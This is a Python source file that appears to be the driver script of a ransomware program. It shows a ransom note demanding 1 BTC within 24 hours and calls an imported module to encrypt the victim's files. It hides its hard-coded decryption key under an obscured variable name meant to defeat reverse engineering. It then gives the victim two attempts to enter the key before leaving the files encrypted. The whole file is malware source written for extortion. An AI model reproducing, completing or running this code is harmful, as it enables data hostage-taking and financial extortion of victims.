import os, sys, time, keyboard, logging

from Ransomware import *

logging.basicConfig(level=logging.INFO)

# Set dimensions of command prompt
os.system('mode con: cols=175 lines=45')

# Pseudo-random number generated by RNG to be used as the ecryption/decryption key
# Given a pseudo-random name in case variable name is retrieved from reverse engineering
ajIXXtKl6fGvkz5MUdS9 = 4488494747201394700

# Number of times the victim has tried to enter a decryption key
key_entry_attempts = 0

# Instructions displayed to the victim
instructions = """

                                                            NO!                          MNO!
                                                        MNO!!         [NBK]          MNNOO!
                                                        MMNO!                           MNNOO!!
                                                        MNOONNOO!   MMMMMMMMMMPPPOII!   MNNO!!!!
                                                        !O! NNO! MMMMMMMMMMMMMPPPOOOII!! NO!
                                                            ! MMMMMMMMMMMMMPPPPOOOOIII! !
                                                            MMMMMMMMMMMMPPPPPOOOOOOII!!
                                                            MMMMMOOOOOOPPPPPPPPOOOOMII!
                                                            MMMMM..    OPPMMP    .,OMI!
                                                            MMMM::   o.,OPMP,.o   ::I!!
                                                                NNM:::.,,OOPM!P,.::::!!
                                                                MMNNNNNOOOOPMO!!IIPPO!!O!
                                                                MMMMMNNNNOO:!!:!!IPPPPOO!
                                                                MMMMMNNOOMMNNIIIPPPOO!!
                                                                    MMMONNMMNNNIIIOO!
                                                                MN MOMMMNNNIIIIIO! OO
                                                                MNO! IiiiiiiiiiiiI OOOO
                                                        NNN.MNO!   O!!!!!!!!!O   OONO NO!
                                                        MNNNNNO!    OOOOOOOOOOO    MMNNON!
                                                            MNNNNO!    PPPPPPPPP    MMNON!
                                                                OO!                   ON!

YOUR FILES ARE BEING ENCRYPTED AS YOU READ THIS MESSAGE. DO NOT CLOSE THIS OR SHUT DOWN YOUR PC AS YOU WILL NEVER BE ABLE TO DECRYPT YOUR FILES.

YOU HAVE 24 HOURS TO DO THE FOLLOWING...
Send 1 BTC to this wallet: 

Please wait to be prompted to enter the key. 
You have 2 attempts to enter it correctly or the program will terminate and your files stay encrypted.
        """

print(instructions) 

# Encrypt the victim's files
ransomware = Ramsomware(ajIXXtKl6fGvkz5MUdS9, True)
ransomware.encrypt_files()

# Keep loop running for 24 hours 
hours = 0
while hours != 24: 
    logging.info('{hours} hour(s) elapsed. ')
    time.sleep(3600) 
    hours += 1  

logging.info('Time is up. You have 5 minutes and 2 attempts to enter the key correctly.')
logging.info('If you enter the key incorrectly more than 2 times or take longer than 5 mins, your files will remain encrypted.')

# Convert to int so it can be used to check for equality
key_entered = int(input("Input the EXACT key sent to you via e-mail:")) 
logging.info('Key entered: {key_entered}') 
 
end_time = time.time() + 60 * 5 # Add 5 minutes onto the time from now
while time.time() < end_time: # Enter loop as long as time hasn't exceeded time limit (5 mins) 
   if key_entry_attempts < 2 and key_entered == ajIXXtKl6fGvkz5MUdS9: # If victim has enough attempts & enters correct key
      logging.info('The key you entered is correct. Decrypting your files - please wait...')
      ransomware.decrypt_files()
      sys.exit()
   elif key_entry_attempts < 2 and key_entered != ajIXXtKl6fGvkz5MUdS9: # If victim has enough attempts & enters incorrect key
      logging.info('The key you entered is incorrect, please try again. You have one more attempt left.')
      key_entry_attempts = key_entry_attempts + 1
      key_entered2 = int(input("This is your last attempt. Enter the key again:")) # Prompt for another key
      if key_entered2 == ajIXXtKl6fGvkz5MUdS9: # If the second key entered is correct, decrypt files
         logging.info('The second key you entered is correct. Decrypting your files...')
         ransomware.decrypt_files()
         sys.exit()
      elif key_entered2 != ajIXXtKl6fGvkz5MUdS9: # If incorrect key entered twice, this will make sure the program exits
         logging.info('Incorrect key entered twice.')
         key_entry_attempts = key_entry_attempts + 1
   else:
      logging.info('Exiting...')
      sys.exit()
